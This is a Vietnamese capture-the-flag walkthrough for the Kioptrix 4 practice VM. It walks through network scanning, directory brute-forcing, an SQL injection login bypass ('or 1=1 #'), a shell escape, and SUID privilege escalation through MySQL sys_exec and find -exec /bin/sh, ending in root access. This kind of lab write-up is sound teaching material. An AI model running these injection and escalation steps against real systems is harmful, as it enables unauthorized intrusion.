Máy ảo Kioptrix thứ 4 này là những thử thách CEHack dễ dàng. Mục tiêu của trò chơi là giành quyền truy cập root thông qua bất kỳ phương tiện nào có thể . Mục đích của những trò chơi này là tìm hiểu các công cụ và kỹ thuật cơ bản trong đánh giá và khai thác lỗ hổng. Có nhiều cách hơn một cách để hoàn thành thành công các thử thách.

Bạn có thể Tải xuống từ đây và chạy cài đặt trong máy ảo của mình.

Penetration 

• Network scanning (netdiscover, Nmap)
• Directory brute-force (dirb)
• Login Form SQli
• Spwaning tty shell
• SUID Privilege escalation
• Get root access and capture the flag

Hãy bắt đầu CEHack !!

Bật máy tấn công của bạn và sử dụng lệnh netdetect để quét mạng cục bộ của bạn để lấy IP mục tiêu.

Như hình, chúng ta sẽ nhắm mục tiêu tại 192.168.1.106, hãy bỏ qua việc liệt kê và quét các cổng và giao thức đang mở. Với sự trợ giúp quét tích cực của nmap, tôi đã quan sát thấy một số cổng và dịch vụ mở đang chạy trên đó.

Vì cổng 80 đang mở nên không lãng phí thời gian, tôi sử dụng dirb để tấn công brute-force thư mục và lthấy /john là thư mục có thể cung cấp thứ gì đó có giá trị cho chúng tôi.

dirb http://192.168.1.106

Do đó, chúng ta khám phá URL http://192.168.1.106/john trong trình duyệt web và nhận thấy tệp john.php. Ttôi không tìm thấy bất kỳ kho báu nào từ bên trong tập tin này :(.

Quay lại trang chủ của nó và đó là trang đăng nhập như hình bên dưới. Ở đây chúng ta có thể thử SQL injection để đăng nhập.

Thật may, tôi chỉ cần nhập thông tin sau và đăng nhập thành công.

Username: john
Password: ' or 1=1 #

Và thấy trang web sau 

Vì cổng 22 của đang mở cho ssh và ta đã liệt kê thông tin xác thực , vì vậy hãy thử đăng nhập để truy cập tty shell của máy nạn nhân và sau đó thực hiện các lệnh bên dưới.

Tên người dùng: john

Mật khẩu: MyNameIsJohn

echo os.system('/bin/bash')
cd /var/www

Hãy xem danh sách tệp và thư mục nơi bạn sẽ nhận được tệp checklogin.php ; mở nó cho bước tiếp theo.

ls
cat checklogin.php

Bằng cách đọc nó, chúng tôi kết luận rằng tên người dùng MySQL là root không có mật khẩu .

Bây giờ, hãy thử đăng nhập vào máy chủ MySQL với sự trợ giúp của lệnh sau và thử thực hiện một số truy vấn độc hại thông qua nó.

mysql -u root -p
SELECT sys_exec('chmod u+s /usr/bin/find');
echo os.system('/bin/bash')
quit

Với MySQL, tôi thử kích hoạt SUID bit cho lệnh find.

Bây giờ hãy di chuyển đến thư mục /tmp và thực hiện lệnh sau để truy cập root.

cd /tmp
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
ls
cat congrats .txt

Yuppiee!!! Chúng ta đã hoàn thành nhiệm vụ này và hoàn thành thử thách.

Tác giả: Aarti Singh

CEH VIETNAM Tổng Hợp & Trình Bày